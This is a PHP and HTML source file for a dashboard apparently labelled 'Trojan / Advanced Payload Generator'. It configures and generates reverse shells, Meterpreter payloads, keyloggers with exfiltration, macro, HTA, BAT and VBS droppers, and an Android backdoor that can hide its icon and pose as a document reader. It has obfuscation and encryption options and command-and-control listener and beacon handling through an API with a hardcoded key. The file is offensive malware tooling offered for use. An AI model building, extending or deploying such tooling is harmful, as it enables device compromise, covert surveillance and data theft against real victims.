<?php
/**
 * Trojan / Advanced Payload Generator Dashboard v7.1
 * Supports all new payload types (HTA, BAT, VBS), obfuscation levels,
 * compression, encryption, C2 integration, and Android Custom Backdoor.
 */

$advanced_mode = isset($_GET['advanced']) ? true : false;
$preset_type   = $_GET['type'] ?? '';

// Determine which module to use
$payload_module = null;
$android_module = null;
$module_name = '';
$is_advanced = false;

if ($advanced_mode) {
    // Advanced mode: we may use AdvancedPayloadModule or AndroidTrojanModule
    if (file_exists(__DIR__ . '/../system/modules/AdvancedPayloadModule.php')) {
        require_once __DIR__ . '/../system/modules/AdvancedPayloadModule.php';
        if (class_exists('AdvancedPayloadModule')) {
            $payload_module = new AdvancedPayloadModule();
            $module_name = 'AdvancedPayloadModule v7.0';
            $is_advanced = true;
        }
    }
    // AndroidTrojanModule might also be needed
    if (file_exists(__DIR__ . '/../system/modules/AndroidTrojanModule.php')) {
        require_once __DIR__ . '/../system/modules/AndroidTrojanModule.php';
        if (class_exists('AndroidTrojanModule')) {
            $android_module = new AndroidTrojanModule();
        }
    }
} else {
    // Basic mode
    require_once __DIR__ . '/includes/EnhancedModuleLoader.php';
    $loader = EnhancedModuleLoader::getInstance();
    if ($loader->isAvailable()) {
        if (file_exists(__DIR__ . '/../system/modules/TrojanModule.php')) {
            require_once __DIR__ . '/../system/modules/TrojanModule.php';
            $payload_module = new EnhancedTrojanModule();
            $module_name = 'EnhancedTrojanModule v2.0';
            $is_advanced = false;
        } else {
            die('TrojanModule.php not found.');
        }
    } else {
        die('Trojan module not available: ' . $loader->getError());
    }
}

// Handle form submission
$generated = null;
$error = null;
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['generate'])) {
    // Base config
    $cfg = [
        'type'     => $_POST['type'] ?? ($is_advanced ? 'meterpreter_reverse_tcp' : 'reverse_shell'),
        'platform' => $_POST['platform'] ?? 'linux',
        'format'   => $_POST['format'] ?? ($is_advanced && $_POST['platform'] === 'android' ? 'apk' : 'sh'),
        'lhost'    => $_POST['lhost'] ?? '127.0.0.1',
        'lport'    => (int)($_POST['lport'] ?? 4444),
        'encryption' => $_POST['encryption'] ?? 'none',
        'extra'    => [
            'c2_enabled' => isset($_POST['c2_enabled']) ? true : false,
            'obfuscation_level' => $_POST['obfuscation_level'] ?? 'medium',
            'expires_in' => isset($_POST['expires_in']) ? (int)$_POST['expires_in'] : null,
            'exfil_method' => $_POST['exfil_method'] ?? 'http',
            'log_path'     => $_POST['log_path'] ?? '/tmp/.keys.log',
            'interval'     => (int)($_POST['interval'] ?? 60)
        ]
    ];

    // Optional compression
    if (isset($_POST['compress']) && $_POST['compress'] == '1') {
        $cfg['extra']['compress'] = true;
        $cfg['extra']['compress_algo'] = $_POST['compress_algo'] ?? 'gzip';
        $cfg['extra']['compress_level'] = (int)($_POST['compress_level'] ?? 9);
    }

    try {
        // Route to appropriate generator
        if ($cfg['type'] === 'android_custom') {
            // Android custom backdoor must be generated by AndroidTrojanModule
            if (!$android_module) {
                throw new Exception('AndroidTrojanModule not available.');
            }
            // Prepare Android-specific options
            $android_cfg = [
                'lhost'           => $cfg['lhost'],
                'lport'           => $cfg['lport'],
                'app_name'        => $_POST['app_name'] ?? 'CosmicUpdate',
                'package_name'    => $_POST['package_name'] ?? 'com.cosmic.update',
                'persistence'     => $_POST['persistence'] ?? 'boot',
                'disguise'        => isset($_POST['disguise']),
                'hide_icon'       => isset($_POST['hide_icon']),
                'beacon_interval' => (int)($_POST['beacon_interval'] ?? 60),
                'use_encryption'  => isset($_POST['use_encryption'])
            ];
            $generated = $android_module->generate_payload($android_cfg);
        } else {
            // All other payload types use the main payload module
            if (!$payload_module) {
                throw new Exception('Payload module not available.');
            }
            $generated = $payload_module->generate_payload($cfg);
        }
    } catch (Exception $e) {
        $error = $e->getMessage();
    }
}
?>
<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title><?php echo $advanced_mode ? '🧬 Advanced Payload Generator v7.1' : '🏴‍☠️ Trojan Generator'; ?></title>
    <link href="https://fonts.googleapis.com/css2?family=Share+Tech+Mono&display=swap" rel="stylesheet">
    <link rel="stylesheet" href="/assets/css/cosmic-c2.css">
    <style>
        .container { max-width:900px; margin:0 auto; }
        .info { background:rgba(0,255,0,0.1); border:1px solid #00ff00; padding:15px; margin:20px 0; border-radius:5px; }
        .form-group { margin-bottom:15px; }
        label { display:block; color:#00ffff; margin-bottom:5px; }
        input, select, textarea { width:100%; padding:8px; background:#000; color:#00ff00; border:1px solid #00ff00; border-radius:4px; font-family:inherit; }
        .btn { background:#000; color:#00ff00; border:2px solid #00ff00; padding:10px 20px; cursor:pointer; font-size:16px; transition:0.3s; margin:5px; }
        .btn:hover { background:#00ff00; color:#000; }
        .btn-primary { border-color:#0ff; color:#0ff; }
        .btn-primary:hover { background:#0ff; color:#000; }
        .result { background:rgba(0,0,0,0.9); border:2px solid #00ffff; padding:15px; margin-top:30px; border-radius:5px; }
        .error { color:#ff0000; border-color:#ff0000; }
        a { color:#00ffff; text-decoration:none; }
        a:hover { text-decoration:underline; }
        .grid-2 { display:grid; grid-template-columns:1fr 1fr; gap:20px; }
    </style>
</head>
<body class="cosmic-scroll-body">
    <div class="container">
        <h1><?php echo $advanced_mode ? '🧬 Advanced Payload Generator v7.1' : '🏴‍☠️ Trojan Generator v2.0'; ?></h1>
        <div class="info">
            <strong>Module:</strong> <?php echo $module_name; ?><br>
            <strong>Mode:</strong> <?php echo $advanced_mode ? 'Enterprise (HTA, BAT, VBS, Obfuscation, C2, Android)' : 'Standard'; ?>
        </div>

        <form method="post">
            <div class="grid-2">
                <div>
                    <div class="form-group">
                        <label>LHOST (attacker IP / domain):</label>
                        <input type="text" name="lhost" placeholder="192.168.1.100" value="<?php echo htmlspecialchars($_POST['lhost'] ?? ''); ?>" required>
                    </div>
                    <div class="form-group">
                        <label>LPORT:</label>
                        <input type="number" name="lport" placeholder="4444" value="<?php echo htmlspecialchars($_POST['lport'] ?? '4444'); ?>" required>
                    </div>
                    <div class="form-group">
                        <label>Platform:</label>
                        <select name="platform">
                            <option value="linux">Linux</option>
                            <option value="windows">Windows</option>
                            <?php if ($advanced_mode): ?>
                            <option value="macos">macOS</option>
                            <option value="android">Android</option>
                            <?php endif; ?>
                        </select>
                    </div>
                </div>
                <div>
                    <div class="form-group">
                        <label>Payload Type:</label>
                        <select name="type">
                            <?php if ($advanced_mode): ?>
                                <option value="meterpreter_reverse_tcp" <?php echo $preset_type==='meterpreter'?'selected':''; ?>>Meterpreter Reverse TCP</option>
                                <option value="android_backdoor_full"   <?php echo $preset_type==='android'?'selected':''; ?>>Android APK Backdoor</option>
                                <option value="persistence"            <?php echo $preset_type==='persistence'?'selected':''; ?>>Persistence Module</option>
                                <option value="keylogger"              <?php echo ($preset_type==='keylogger'||$preset_type==='')?'selected':''; ?>>Cross‑Platform Keylogger</option>
                                <option value="word_macro">Word Macro (VBA)</option>
                                <option value="pdf_embedded">PDF Embedded (JS)</option>
                                <option value="android_installer">Android APK Installer</option>
                                <option value="hta">HTA Payload</option>
                                <option value="bat">Batch File</option>
                                <option value="vbs">VBScript</option>
                                <option value="android_custom">📱 Android Custom Backdoor</option>
                            <?php else: ?>
                                <option value="reverse_shell">Reverse Shell</option>
                                <option value="bind_shell">Bind Shell</option>
                            <?php endif; ?>
                        </select>
                    </div>
                    <div class="form-group">
                        <label>Format / Language:</label>
                        <select name="format">
                            <option value="sh">Shell Script (.sh)</option>
                            <option value="py">Python (.py)</option>
                            <option value="ps1">PowerShell (.ps1)</option>
                            <?php if ($advanced_mode): ?>
                            <option value="vbs">VBScript (.vbs)</option>
                            <option value="applescript">AppleScript (.applescript)</option>
                            <option value="apk">Android APK (.apk)</option>
                            <option value="docm">Word Macro (.docm)</option>
                            <option value="pdf">PDF (.pdf)</option>
                            <option value="hta">HTA (.hta)</option>
                            <option value="bat">Batch (.bat)</option>
                            <?php endif; ?>
                        </select>
                    </div>
                </div>
            </div>

            <?php if ($advanced_mode): ?>
            <div style="background:rgba(0,255,255,0.1); border:1px solid #0ff; border-radius:8px; padding:15px; margin:20px 0;">
                <h4 style="color:#0ff;">🧠 Advanced Options</h4>
                <div class="grid-2">
                    <div>
                        <div class="form-group">
                            <label>Encryption:</label>
                            <select name="encryption">
                                <option value="none">None</option>
                                <option value="base64">Base64</option>
                                <option value="rot13">ROT13</option>
                                <option value="xor">XOR (key: COSMIC_OSINT_2026)</option>
                                <option value="aes">AES-256-CBC (if available)</option>
                            </select>
                        </div>
                        <div class="form-group">
                            <label>Obfuscation Level:</label>
                            <select name="obfuscation_level">
                                <option value="low">Low</option>
                                <option value="medium" selected>Medium</option>
                                <option value="high">High</option>
                                <option value="insane">Insane</option>
                            </select>
                        </div>
                    </div>
                    <div>
                        <div class="form-group">
                            <label>Compression:</label>
                            <label style="display:inline; margin-left:10px;">
                                <input type="checkbox" name="compress" value="1"> Enable
                            </label>
                        </div>
                        <div class="form-group">
                            <label>Compression Algorithm:</label>
                            <select name="compress_algo">
                                <option value="gzip">GZIP</option>
                                <option value="bzip2">BZIP2</option>
                                <option value="lz4">LZ4</option>
                                <option value="zstd">ZSTD</option>
                            </select>
                        </div>
                        <div class="form-group">
                            <label>Compression Level (1-9):</label>
                            <input type="number" name="compress_level" min="1" max="9" value="9">
                        </div>
                    </div>
                </div>

                <div class="form-group">
                    <label>🧠 C2 Integration:</label>
                    <label style="display:inline; margin-left:10px;">
                        <input type="checkbox" name="c2_enabled" value="1" checked> Enable C2 beaconing
                    </label>
                    <small style="display:block; color:#888;">Payload will phone home to /c2/beacon.php?uuid=...</small>
                </div>

                <div class="form-group">
                    <label>Payload Expiry (seconds, leave empty for none):</label>
                    <input type="number" name="expires_in" placeholder="e.g., 3600">
                </div>

                <?php if (isset($_POST['type']) && $_POST['type'] === 'keylogger'): ?>
                <div class="form-group">
                    <label>Exfiltration Method:</label>
                    <select name="exfil_method">
                        <option value="http">HTTP POST</option>
                        <option value="dns">DNS (simulated)</option>
                        <option value="smtp">SMTP</option>
                    </select>
                </div>
                <div class="form-group">
                    <label>Log File Path (on target):</label>
                    <input type="text" name="log_path" value="/tmp/.keys.log">
                </div>
                <div class="form-group">
                    <label>Upload Interval (seconds):</label>
                    <input type="number" name="interval" value="60" min="1">
                </div>
                <?php endif; ?>
            </div>
            <?php endif; ?>

            <!-- Android Custom Options (hidden by default) -->
            <div id="android-options" style="display:none; background:rgba(0,255,0,0.05); border:1px solid #0f0; border-radius:8px; padding:15px; margin:20px 0;">
                <h4 style="color:#0f0;">📱 Android Custom Options</h4>
                <div class="grid-2">
                    <div>
                        <div class="form-group">
                            <label>App Name:</label>
                            <input type="text" name="app_name" value="CosmicUpdate">
                        </div>
                        <div class="form-group">
                            <label>Package Name:</label>
                            <input type="text" name="package_name" value="com.cosmic.update">
                        </div>
                        <div class="form-group">
                            <label>Persistence:</label>
                            <select name="persistence">
                                <option value="boot">Boot Receiver</option>
                                <option value="alarm">Alarm Manager</option>
                                <option value="job">Job Scheduler</option>
                                <option value="none">None</option>
                            </select>
                        </div>
                    </div>
                    <div>
                        <div class="form-group">
                            <label>Beacon Interval (seconds):</label>
                            <input type="number" name="beacon_interval" value="60" min="10">
                        </div>
                        <div class="form-group">
                            <label style="display:block;">Options:</label>
                            <label><input type="checkbox" name="disguise" value="1"> Disguise as document reader</label><br>
                            <label><input type="checkbox" name="hide_icon" value="1"> Hide app icon</label><br>
                            <label><input type="checkbox" name="use_encryption" value="1"> Encrypt C2 traffic</label>
                        </div>
                    </div>
                </div>
            </div>

            <button type="submit" name="generate" class="btn btn-primary">🚀 Generate Payload</button>
        </form>

        <?php if ($error): ?>
        <div class="result" style="border-color:#ff0000;">
            <h3 style="color:#ff0000;">❌ Generation Failed</h3>
            <pre><?php echo htmlspecialchars($error); ?></pre>
        </div>
        <?php endif; ?>

        <?php if ($generated): ?>
        <div class="result" id="generation-result">
            <h3 style="color:#00ff00;">✅ Payload Generated Successfully</h3>
            <p><strong>Filename:</strong> <?php echo htmlspecialchars($generated['filename']); ?></p>
            <p><strong>Path:</strong> <?php echo htmlspecialchars($generated['path']); ?></p>
            <p><strong>Size:</strong> <?php echo $generated['size']; ?> bytes</p>
            <p><strong>SHA256:</strong> <code style="background:#000; color:#0ff;"><?php echo $generated['hash']['sha256']; ?></code></p>
            <?php if (isset($generated['warning'])): ?>
            <p style="color:#ffff00;"><strong>Warning:</strong> <?php echo htmlspecialchars($generated['warning']); ?></p>
            <?php endif; ?>

            <!-- PERFORMANCE SCALE -->
            <div style="margin-top:20px; padding:15px; background:rgba(0,0,0,0.3); border-radius:8px;">
                <h4 style="color:#0ff; margin-top:0;">⚡ Generation Performance</h4>
                <div style="display:flex; justify-content:space-between; margin-bottom:5px;">
                    <span>Speed:</span>
                    <span id="gen-speed">calculating...</span>
                </div>
                <div style="width:100%; height:10px; background:#333; border-radius:5px; overflow:hidden;">
                    <div id="speed-bar" style="width:0%; height:100%; background:linear-gradient(90deg, #0f0, #ff0, #f00); transition:width 1s;"></div>
                </div>
                <div style="display:flex; justify-content:space-between; margin-top:10px;">
                    <span>Disk Space:</span>
                    <span id="disk-space"><?php echo round(disk_free_space(__DIR__) / 1024 / 1024, 2); ?> MB free</span>
                </div>
                <div style="width:100%; height:10px; background:#333; border-radius:5px; overflow:hidden; margin-top:5px;">
                    <?php
                        $total = disk_total_space(__DIR__);
                        $free = disk_free_space(__DIR__);
                        $used = $total - $free;
                        $usedPercent = ($used / $total) * 100;
                    ?>
                    <div style="width:<?php echo $usedPercent; ?>%; height:100%; background:#0ff;"></div>
                </div>
                <p style="font-size:0.8em; color:#888; margin-top:10px;">Generation completed in <span id="gen-time"><?php echo round(microtime(true) - $_SERVER['REQUEST_TIME_FLOAT'], 3); ?></span> seconds.</p>
            </div>

            <!-- POST‑GENERATION ACTIONS -->
            <div style="margin-top:30px; padding:20px; background:rgba(0,255,0,0.05); border:1px solid #0f0; border-radius:8px;">
                <h4 style="color:#0ff; margin-top:0;">🚀 Next Steps</h4>

                <!-- Listener Creation Section -->
                <div id="listener-section">
                    <p><strong>Listener for this payload:</strong> (LHOST: <?php echo htmlspecialchars($generated['config']['lhost'] ?? $generated['lhost']); ?>, LPORT: <?php echo $generated['config']['lport'] ?? $generated['lport']; ?>)</p>
                    <button class="btn" onclick="createListener('<?php echo htmlspecialchars($generated['config']['lhost'] ?? $generated['lhost']); ?>', <?php echo $generated['config']['lport'] ?? $generated['lport']; ?>)">🎧 Create Listener</button>
                    <div id="listener-status" style="margin-top:15px;"></div>
                </div>

                <!-- Connection Status -->
                <div id="connection-section" style="margin-top:20px; display:none;">
                    <h5 style="color:#0f0;">📡 Payload Connection Status</h5>
                    <div id="connection-status">Waiting for first beacon...</div>
                    <div id="c2-link" style="margin-top:15px; display:none;">
                        <a href="c2-dashboard.php?view=payloads&uuid=<?php echo $generated['c2_uuid'] ?? ''; ?>" class="btn btn-primary">🎮 Go to C2 Dashboard</a>
                    </div>
                </div>
            </div>

            <!-- Download Button -->
            <div style="margin-top:20px;">
                <a href="<?php echo $generated['download_url']; ?>" class="btn btn-primary">💾 Download Payload</a>
                <a href="?advanced=1" class="btn">🔄 Generate Another</a>
            </div>
        </div>

        <script>
        let payloadUuid = '<?php echo $generated['c2_uuid'] ?? ''; ?>';
        let checkInterval = null;

        function createListener(lhost, lport) {
            document.getElementById('listener-status').innerHTML = 'Starting listener...';
            fetch('/c2/api/index.php?action=create_listener&key=COSMIC-C2-SECRET-2026', {
                method: 'POST',
                headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
                body: `name=Payload_Listener_${lport}&lhost=${lhost}&lport=${lport}&protocol=tcp&payload_type=${encodeURIComponent('generic/shell_reverse_tcp')}`
            })
            .then(r => r.json())
            .then(data => {
                if (data.status === 'ok') {
                    document.getElementById('listener-status').innerHTML = '<span style="color:#0f0;">✅ Listener created (ID: ' + data.listener_id + '). Starting...</span>';
                    return fetch('/c2/api/index.php?action=start_listener&key=COSMIC-C2-SECRET-2026', {
                        method: 'POST',
                        headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
                        body: `id=${data.listener_id}`
                    });
                } else {
                    document.getElementById('listener-status').innerHTML = '<span style="color:#f00;">❌ Failed to create listener: ' + data.message + '</span>';
                }
            })
            .then(r => r.json())
            .then(data => {
                if (data && data.status === 'ok') {
                    document.getElementById('listener-status').innerHTML = '<span style="color:#0f0;">✅ Listener running (PID: ' + data.pid + '). Waiting for payload connection...</span>';
                    document.getElementById('connection-section').style.display = 'block';
                    startPolling();
                } else if (data) {
                    document.getElementById('listener-status').innerHTML = '<span style="color:#f00;">❌ Failed to start listener: ' + data.message + '</span>';
                }
            })
            .catch(err => {
                document.getElementById('listener-status').innerHTML = '<span style="color:#f00;">❌ Error: ' + err + '</span>';
            });
        }

        function startPolling() {
            if (!payloadUuid) {
                document.getElementById('connection-status').innerHTML = '<span style="color:#ff0;">⚠️ Payload not C2‑enabled – no beacon tracking.</span>';
                return;
            }
            checkInterval = setInterval(() => {
                fetch('/c2/api/index.php?action=beacons&uuid=' + payloadUuid + '&key=COSMIC-C2-SECRET-2026')
                .then(r => r.json())
                .then(data => {
                    if (data.status === 'ok' && data.data.length > 0) {
                        document.getElementById('connection-status').innerHTML = '<span style="color:#0f0;">✅ Payload connected! Last beacon: ' + new Date(data.data[0].beacon_time * 1000).toLocaleString() + '</span>';
                        document.getElementById('c2-link').style.display = 'block';
                        clearInterval(checkInterval);
                    }
                });
            }, 5000);
        }

        <?php if (!empty($generated['c2_uuid'])): ?>
        document.getElementById('connection-section').style.display = 'block';
        startPolling();
        <?php endif; ?>

        // Calculate speed
        let size = <?php echo $generated['size']; ?>;
        let time = <?php echo round(microtime(true) - $_SERVER['REQUEST_TIME_FLOAT'], 3); ?>;
        let speed = size / time; // bytes per second
        let speedKbps = (speed / 1024).toFixed(2);
        document.getElementById("gen-speed").innerText = speedKbps + " KB/s";
        let percent = Math.min(100, (speed / (1024*1024)) * 100);
        document.getElementById("speed-bar").style.width = percent + "%";
        </script>
        <?php endif; ?>
    </div>

    <!-- Show/hide Android options based on selected payload type -->
    <script>
    document.querySelector('select[name="type"]').addEventListener('change', function() {
        var androidOpts = document.getElementById('android-options');
        androidOpts.style.display = (this.value === 'android_custom') ? 'block' : 'none';
    });
    if (document.querySelector('select[name="type"]').value === 'android_custom') {
        document.getElementById('android-options').style.display = 'block';
    }
    </script>

    <script src="/assets/js/unified-quicknav.js" defer></script>
</body>
</html>
